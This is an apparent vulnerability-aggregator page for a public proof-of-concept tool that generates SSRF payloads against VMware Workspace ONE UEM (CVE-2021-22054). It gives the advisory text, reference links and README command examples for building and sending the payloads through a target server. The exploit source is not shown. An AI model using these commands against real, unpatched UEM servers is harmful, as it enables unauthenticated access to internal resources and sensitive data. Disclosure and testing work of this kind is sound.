CVE-2021-22054 PoC — Vmware Workspace One 代码问题漏洞

Source

https://github.com/MKSx/CVE-2021-22054

Associated Vulnerability

Title:Vmware Workspace One 代码问题漏洞 (CVE-2021-22054)
Description:VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain an SSRF vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information.

Description

Generate SSRF payloads

Readme

# CVE-2021-22054
Generate SSRF payloads

#### References
https://blog.assetnote.io/2022/04/27/advisory-vmware-workspace-one-uem/

https://blog.assetnote.io/2022/04/27/vmware-workspace-one-uem-ssrf/

#### Examples
```bash

# generate POC
python3 ssrf.py --url https://target.com --url https://example.com --airwatch
python3 ssrf.py --url https://target.com --url https://example.com

# generate PPOC and send request
python3 ssrf.py --url https://target.com --url https://example.com --airwatch --request --proxy http://127.0.0.1:8080
python3 ssrf.py --url https://target.com --url https://example.com --airwatch --request --method POST --data '{"a":1}' -H 'Content-Type: application/json" --debug-headers
```

![image](https://user-images.githubusercontent.com/17793927/171933588-1b8d92f4-c751-40ca-a6bc-ad2102022bcf.png)

![image](https://user-images.githubusercontent.com/17793927/171933638-a0be0782-32cc-41db-b892-b49a9adcd574.png)

File Snapshot

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!